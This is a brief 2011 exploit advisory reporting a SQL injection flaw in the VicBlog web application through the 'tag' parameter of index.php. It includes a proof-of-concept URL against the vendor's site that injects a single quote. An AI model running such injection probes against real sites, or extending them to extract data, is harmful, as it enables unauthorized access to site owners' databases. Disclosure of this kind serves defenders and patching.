# Exploit Title: VicBlog SQL Injection # Date: 2011 # Author: Eyup CELIK # Software Link: http://www.vicdesigns.com.au # Version: All Version # Tested on: All versions are Vulnerability ISSUE SQL Injection can be done using the command input Vulnerable Page: index.php Example: index.php?page=posts&tag= Exploit: index.php/1' POC: http://www.vicdesigns.com.au/vicblog/index.php?page=posts&tag=1%27 Thanks, Eyup CELIK Bilgi Teknolojileri Güvenlik Uzmani http://www.eyupcelik.com.tr